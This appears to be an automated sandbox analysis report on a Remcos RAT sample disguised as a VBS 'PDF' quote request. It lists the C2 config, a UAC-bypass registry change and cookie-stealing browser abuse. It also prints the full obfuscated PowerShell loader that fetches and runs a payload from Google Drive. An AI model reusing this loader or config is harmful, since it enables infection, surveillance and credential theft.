remcos | 1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Richiesta Proposta (MACHINES ITALIA) 18-11-2024·pdf.vbs
Size

15KB
MD5

57a98d83eebfd7536413c107b5561bcd
SHA1

ab660a6cdb0bd632e307fb5b69f895df31ef4c67
SHA256

1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae
SHA512

9c985a943bcd416e290374c29619dfd7011450f8d469b3d899de2235a2dd79d2b1eb5d845ea199ecd95f5349f2fec137aab02bc46697f778a8ee95376ce80608
SSDEEP

384:YwAAp2YC86mHC6GpbW+lqPIjijLUgZSPDctjjPhnwLCeFFBDq43UVcm9:YopU6OqPy6LUgaGvlwLZFFBD/3UqY

Score

10^/10

remcos remotehost credential_access discovery evasion rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

tr2vobvq.duckdns.org:3613

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-4S2GUG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	process
3	972	WScript.exe
8	3028	powershell.exe
12	3028	powershell.exe
26	4896	msiexec.exe
28	4896	msiexec.exe
31	4896	msiexec.exe
41	4896	msiexec.exe
43	4896	msiexec.exe
49	4896	msiexec.exe
50	4896	msiexec.exe
51	4896	msiexec.exe
52	4896	msiexec.exe
54	4896	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

msedge.exemsedge.exeChrome.exemsedge.exemsedge.exemsedge.exeChrome.exeChrome.exeChrome.exe

pid process

4264 msedge.exe
3640 msedge.exe
4628 Chrome.exe
3608 msedge.exe
1988 msedge.exe
1832 msedge.exe
2712 Chrome.exe
1232 Chrome.exe
4576 Chrome.exe

pid	process
4264	msedge.exe
3640	msedge.exe
4628	Chrome.exe
3608	msedge.exe
1988	msedge.exe
1832	msedge.exe
2712	Chrome.exe
1232	Chrome.exe
4576	Chrome.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

7 drive.google.com
8 drive.google.com
26 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid process

4896 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid process

64 powershell.exe
4896 msiexec.exe

flow	ioc
7	drive.google.com
8	drive.google.com
26	drive.google.com

pid	process
4896	msiexec.exe

Suspicious use of SetThreadContext 30 IoCs

Processes:

msiexec.exe

description	pid	process	target process
PID 4896 set thread context of 3672	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 1840	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 3892	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 3044	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 1004	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4800	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 3736	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4760	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4616	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4268	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 3908	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4080	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2468	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2280	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 956	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2056	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4564	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 3464	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2824	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 772	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4364	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2848	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4240	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 3004	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 4700	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 1688	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2504	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 2272	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 724	4896	msiexec.exe	msiexec.exe
PID 4896 set thread context of 1668	4896	msiexec.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 30 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3300	1840	WerFault.exe	msiexec.exe
2652	3892	WerFault.exe	msiexec.exe
540	3672	WerFault.exe	msiexec.exe
920	3044	WerFault.exe	msiexec.exe
1700	1004	WerFault.exe	msiexec.exe
1468	4800	WerFault.exe	msiexec.exe
4132	3736	WerFault.exe	msiexec.exe
4564	4760	WerFault.exe	msiexec.exe
1284	4616	WerFault.exe	msiexec.exe
3500	4268	WerFault.exe	msiexec.exe
920	3908	WerFault.exe	msiexec.exe
1468	4080	WerFault.exe	msiexec.exe
552	2468	WerFault.exe	msiexec.exe
2024	2280	WerFault.exe	msiexec.exe
3120	956	WerFault.exe	msiexec.exe
892	2056	WerFault.exe	msiexec.exe
2192	3464	WerFault.exe	msiexec.exe
540	4564	WerFault.exe	msiexec.exe
3452	2824	WerFault.exe	msiexec.exe
4100	772	WerFault.exe	msiexec.exe
680	4364	WerFault.exe	msiexec.exe
4952	4240	WerFault.exe	msiexec.exe
4040	3004	WerFault.exe	msiexec.exe
1172	2848	WerFault.exe	msiexec.exe
1292	1688	WerFault.exe	msiexec.exe
4496	4700	WerFault.exe	msiexec.exe
3924	2504	WerFault.exe	msiexec.exe
1856	2272	WerFault.exe	msiexec.exe
4420	1668	WerFault.exe	msiexec.exe
3984	724	WerFault.exe	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exemsiexec.execmd.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeChrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4388 reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
4388	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

pid	process
3028	powershell.exe
3028	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4628	Chrome.exe
4628	Chrome.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe

Suspicious behavior: MapViewOfSection 32 IoCs

Processes:

powershell.exemsiexec.exe

pid	process
64	powershell.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe
4896	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

3608 msedge.exe
3608 msedge.exe
3608 msedge.exe
3608 msedge.exe

pid	process
3608	msedge.exe
3608	msedge.exe
3608	msedge.exe
3608	msedge.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exeChrome.exe

description	pid	process
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe
Token: SeShutdownPrivilege	4628	Chrome.exe
Token: SeCreatePagefilePrivilege	4628	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Chrome.exemsedge.exe

pid process

4628 Chrome.exe
3608 msedge.exe
3608 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid process

4896 msiexec.exe

pid	process
4628	Chrome.exe
3608	msedge.exe
3608	msedge.exe

pid	process
4896	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exeChrome.exe

description	pid	process	target process
PID 972 wrote to memory of 3028	972	WScript.exe	powershell.exe
PID 972 wrote to memory of 3028	972	WScript.exe	powershell.exe
PID 64 wrote to memory of 4896	64	powershell.exe	msiexec.exe
PID 64 wrote to memory of 4896	64	powershell.exe	msiexec.exe
PID 64 wrote to memory of 4896	64	powershell.exe	msiexec.exe
PID 64 wrote to memory of 4896	64	powershell.exe	msiexec.exe
PID 4896 wrote to memory of 4036	4896	msiexec.exe	cmd.exe
PID 4896 wrote to memory of 4036	4896	msiexec.exe	cmd.exe
PID 4896 wrote to memory of 4036	4896	msiexec.exe	cmd.exe
PID 4036 wrote to memory of 4388	4036	cmd.exe	reg.exe
PID 4036 wrote to memory of 4388	4036	cmd.exe	reg.exe
PID 4036 wrote to memory of 4388	4036	cmd.exe	reg.exe
PID 4896 wrote to memory of 4628	4896	msiexec.exe	Chrome.exe
PID 4896 wrote to memory of 4628	4896	msiexec.exe	Chrome.exe
PID 4628 wrote to memory of 3064	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 3064	4628	Chrome.exe	Chrome.exe
PID 4896 wrote to memory of 3672	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3672	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3672	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3672	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 1840	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 1840	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 1840	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 1840	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3892	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3892	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3892	4896	msiexec.exe	msiexec.exe
PID 4896 wrote to memory of 3892	4896	msiexec.exe	msiexec.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1564	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 660	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 660	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1332	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1332	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1332	4628	Chrome.exe	Chrome.exe
PID 4628 wrote to memory of 1332	4628	Chrome.exe	Chrome.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Richiesta Proposta (MACHINES ITALIA) 18-11-2024·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Geochemically Ejerlst Attributnavns Fortrende Feminality Hereticas #><#Afluringernes Pestbyld Panpipes #>$Thongy='Forraadnelsernes';function Counterreforms($Kubikindholds){If ($host.DebuggerEnabled) {$Elefantordnerne=4} for ($Pseudosymmetrical123=$Elefantordnerne;;$Pseudosymmetrical123+=5){if(!$Kubikindholds[$Pseudosymmetrical123]) { break }$Skydeskive+=$Kubikindholds[$Pseudosymmetrical123]}$Skydeskive}function Natbordets($Dokhavns){ .($Gallinule) ($Dokhavns)}$Akademiserings=Counterreforms 'VincnLoynEA peTPeri.SlaawVensehomob KntC Ulfl.yclIVitrECultNReplt';$Officialese=Counterreforms 'R toMBut oCl nzFulliadd,lBiffl We aPe,p/';$Buttes=Counterreforms 'bestT betlA grs fug1 nke2';$Logaritmen='Pogr[Ma dnKomtespriTMeth.S enSLusceVicurIn,ovFinniFil,CIbr e,ejiPForhO raiPiroNGranT PorMSikkALsean OptA BosGP rieCephRYuru]Dobb:Icon:Re tSVexae UdecMarkUFeltR Un iVatttUpbuY duppTintRSpo OAfskt edsoHo.pcThr,oportL,arz=Stri$ remBCentulagetUdarT SkeeMakrS';$Officialese+=Counterreforms 'Coun5Fis..Alky0Flex Omfo( DisWLeuciIncanMermdOveroBredwPrefsMont AlchNYderTUnp Fjer1Carr0 P i.Cine0phot; san CentWUvgeiShepnSvin6Beza4o ea;Sade Me.txBuks6Kru 4Hind;Holo dlr FodvE ke: Swa1Tran3 hyl1 rak.Affa0Indb)D.co IdriGHarce Pr cConvk L,goKr k/ Ind2Nv e0F mi1Sc l0Unwi0 ho1 War0Birt1Hand BydeFSynciSys,r udeeUp.lf LeaoSt.mxYear/G.ns1Real3unbu1Depo.Merc0';$Outlearning=Counterreforms 'MidtU oarsAccleh verTrag- EndA W.aGEleceSpadNRebet';$Foreskriver=Counterreforms 'FilihKom tAngrt Qu p UnasChom:Telo/Lim /AfsvdSolbrbeliiSma v T ye Per. ieg Eduo Ga.ojerngOve lSupeeGraf. StjcCo,noSnkemUltr/EneruKa ec Str? MuleFastxFr lp Retostifr lkytMil,=krybdSgetoKanawStrinIndsl jefoSinga svadAuto&TrvaiI otd R d=S ag1NatraNedfAmuseZVoteB rafNOust5Snob- BukV Regw Se,xRatoq ,toxUgudsEmanSNynauFaneP SupBMathMEnchX Bar2Uns,8TricVFod.RBe.muUnusbOve UT ebnZeeiH UdvxHemo8Desao KluJ';$Kodelaasene231=Counterreforms 'Nonc>';$Gallinule=Counterreforms 'PhasIT,roeManeX';$Ransackers='Standardprogrammers';$Artolater='\Ostentation.Non';Natbordets (Counterreforms 'Pig $SkriG VenladopO Sh BDereALa.elFluo: HypPResuO Le,s etetpeireKejsx Sadi Jens GottAmerESaloNDeteTW bf=Euch$CoxoEciern fl v sam:HenvaMnempByg PChokDA riAgaudt AspAKany+fo a$ Beta.ubrrFedntR,gaoI.dsl C aASport SupEKurtr');Natbordets (Counterreforms ' I r$OptlG uneLT,peOO erbO.hyATo vlCh r:Acrik edkRBrani CrugAm.tsA meKPropa GromOverMOblae arbR Para HlotT.ni=,nvi$ C mF psOhygerReb.eforhsDystK ampr AfsIOuttV.ygre,verRBes.. katS injPColllGnawISa.mTtrae(N,en$M trkAfstoMispdSickEChemlBageA Beea,alks .fsE.hotnGrsre ste2Enek3 Rev1Fera)');Natbordets (Counterreforms $Logaritmen);$Foreskriver=$Krigskammerat[0];$Storico123=(Counterreforms 'Gesc$DentgDobbl R mo Spab Hena BefLFi,k:PindE tamPSofahKiesO PacdChorsquoa=G,apn fluEBaciw Kni-Fr bO fskbGobbjbetjEOxy c MesTsai PrepS GeryUngrsPoettAdene OvemDyna.Forb$Curtasuc KOptaA EksdKryde ,amMMikri DaiSHndtEErhvRRundIBrusNCoungMoloS');Natbordets ($Storico123);Natbordets (Counterreforms 'Till$BamaEOpsppAghohTtheoprocdJa rsPeda. ArgH LabePutraRevedMetreFontr BetsU or[Fist$ ,gnO MaruTramtElmal Neke AutaPe srDaarn Syni cann D mgD.bg]Cyc,=Shiv$.aceO Spif.odtfSciliOutscHeliiOpiuaUddilHalveModvsBi.ne');$Pulmotrachearia=Counterreforms 'Trow$CycaEartipR,nshLigno WoodUnf,sConq. anlDT pso Spiw Deln NedlStovoJyllaJackd TrkFForjiEnd lAfs eB,nt(Fear$Sla,FD nkoFor rdi fePilisSkonkJodtrAnvei.elpvGodkeNonsrConv,pret$S,ciBInsilOrniaC,afk SugkMokkeNondd Adee omosFall)';$Blakkedes=$Postexistent;Natbordets (Counterreforms 'Bila$HitcgConjLMinuo isB AkkAKombLskat:S,atpS.igrBortUAldeN enEFlatRb,urs Svo=Opht(mas tOvereOeveSRelitFred-WrigP,nhaaKonstJingh Pro Rum$Camub BunlZe,mAEmbekTel.K satE smadDanseDrabsmyth)');while (!$Pruners) {Natbordets (Counterreforms 'T nd$Necrg analSperoNotabNikkaFo,slm rk:AggrRUneqeSu ecHeteoUme uStenpBri s vi = kum$rengvi daoShipmTrebipseutS lgo') ;Natbordets $Pulmotrachearia;Natbordets (Counterreforms 'Ideos wr,t NarA WesRBio.TUdga- DepSCha,L Bu,eEremeBeziPSy f ,ilf4');Natbordets (Counterreforms ' Ove$K ltGre.tLAntaO,appbundeAMilil Liv: AmapSkrar H.rUKre nSkidEoverrJoshs V d=O.rr(KoortStanESorts oveTSkat-ProcPEcteAPoneTVarmHFjol Par$civibTjenLMisraChauKForskSkvaEIncuDV cteMar,SExu )') ;Natbordets (Counterreforms 'Fisk$Ti kGSkruL aboOG,ribCochAF jtLPh l:BasuiTeenn.yudDUforbConfYTaktg BadGFoxeEStauRGlateFrgnnGr es For=Hers$ vivg AfllMycoO devbA,tiALuftLThyr:quinA.einPgodbpRetieFondLStafSTaloiRe.uNEnhuB T,mlTentOSkatmCrissVoveTGhauECapirLacu+ ru+Hunn%Tang$PreckP.larSkudI Dr,gEnteS Spok Br.Ano rmAn oML nse T lrUndeAEnchtPleo.Selec BaroSympuMarcnSmaat') ;$Foreskriver=$Krigskammerat[$Indbyggerens]}$Brilleslangers=325720;$Sensitometrically=31471;Natbordets (Counterreforms 'Kl d$H,angInteLT,llO o,yb emoAUr ilGloc:PersQImpruPhreEkaprrVandiI leLBil LAalbae sp Aand= ryk ExingVildeIjolTFauv-BlaccNa oOSupenSyttt ShaETan NKanoTdr,p Tyvs$I flBraveL IndA RetkBolik Bl ededid IndeDabcS');Natbordets (Counterreforms 'Data$FamigInstlEuchoRettb iladepulHack: Ti,PFormhPityyRotolL gelVesio UnssD,imt P soSnacm C niMon,nAr baVisceGl.n2Udta6Krig Phth=fea, Fr [SammSUtnkyUdbrs StatHegneKn lmFidu. olfCF okoInfrnGenevQu neVentrRepat ta]Orme: ulm:DishFE nerInc,o PremdishB,raga klis useSpec6Breb4Wam S,rokt orsrJestiPrean,ekygsans(Arve$JoguQ enuIn.leRadirCroqiC,rdl urilDro aM xe)');Natbordets (Counterreforms 'Fald$O eyg Un LKystO pirB Pura.ommL,and: MulUMolenLe sfCasta,ensv CroOUltrU C nr sh IUnd,nKoorg lie Medh=n ph Opda[Pre,s etrYEo.uSnsvitHy.eE idemblik.n opT ,smeBondXPercTJon..Dob.eR,laNvinkCBib O,egedLoesi Me NHumogFall]M ga:Inde: ugAEle,sDmmeC Pe.i BigiUnc,. .erGBlinESesqtUnmeS Ex tTetrR G.iI rotNU bogBran(samm$FornpPsycHTeokyLynbl visLsstnOA.tis,etht nnOZippm Deti ,ugnHandA Came Bro2Stet6omby)');Natbordets (Counterreforms 'Malp$DeklG onoL Op oTor.b ,liaCa,tlA ad:Sno FMicrLFdreuFireGP titNonaSPro,KGallYSpaldCaudn FinIBrann LetgChroSRevebOni AEp,cnha,de A tR Hy NPer.eLys,= Ant$L ukuTretnUlstF BroaStorvPaciOS edu ilorDr.fi Fa nClasgHyge.GaluSUhanUAdvebuv.dSCatit rotR RedIPirrNSa,rG Und( Udk$ F uBFlygrWastiRet LVitilVittELouksL.niLTotoACostNNa rg xtreSpjtrPapis Dem,Kont$VaassFluieDimiNSandS subIDiffT teOT ksmTautev ejT HadrKod.IMau,CjemaAElevLCo wL GeyyCinq)');Natbordets $Flugtskydningsbanerne;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Geochemically Ejerlst Attributnavns Fortrende Feminality Hereticas #><#Afluringernes Pestbyld Panpipes #>$Thongy='Forraadnelsernes';function Counterreforms($Kubikindholds){If ($host.DebuggerEnabled) {$Elefantordnerne=4} for ($Pseudosymmetrical123=$Elefantordnerne;;$Pseudosymmetrical123+=5){if(!$Kubikindholds[$Pseudosymmetrical123]) { break }$Skydeskive+=$Kubikindholds[$Pseudosymmetrical123]}$Skydeskive}function Natbordets($Dokhavns){ .($Gallinule) ($Dokhavns)}$Akademiserings=Counterreforms 'VincnLoynEA peTPeri.SlaawVensehomob KntC Ulfl.yclIVitrECultNReplt';$Officialese=Counterreforms 'R toMBut oCl nzFulliadd,lBiffl We aPe,p/';$Buttes=Counterreforms 'bestT betlA grs fug1 nke2';$Logaritmen='Pogr[Ma dnKomtespriTMeth.S enSLusceVicurIn,ovFinniFil,CIbr e,ejiPForhO raiPiroNGranT PorMSikkALsean OptA BosGP rieCephRYuru]Dobb:Icon:Re tSVexae UdecMarkUFeltR Un iVatttUpbuY duppTintRSpo OAfskt edsoHo.pcThr,oportL,arz=Stri$ remBCentulagetUdarT SkeeMakrS';$Officialese+=Counterreforms 'Coun5Fis..Alky0Flex Omfo( DisWLeuciIncanMermdOveroBredwPrefsMont AlchNYderTUnp Fjer1Carr0 P i.Cine0phot; san CentWUvgeiShepnSvin6Beza4o ea;Sade Me.txBuks6Kru 4Hind;Holo dlr FodvE ke: Swa1Tran3 hyl1 rak.Affa0Indb)D.co IdriGHarce Pr cConvk L,goKr k/ Ind2Nv e0F mi1Sc l0Unwi0 ho1 War0Birt1Hand BydeFSynciSys,r udeeUp.lf LeaoSt.mxYear/G.ns1Real3unbu1Depo.Merc0';$Outlearning=Counterreforms 'MidtU oarsAccleh verTrag- EndA W.aGEleceSpadNRebet';$Foreskriver=Counterreforms 'FilihKom tAngrt Qu p UnasChom:Telo/Lim /AfsvdSolbrbeliiSma v T ye Per. ieg Eduo Ga.ojerngOve lSupeeGraf. 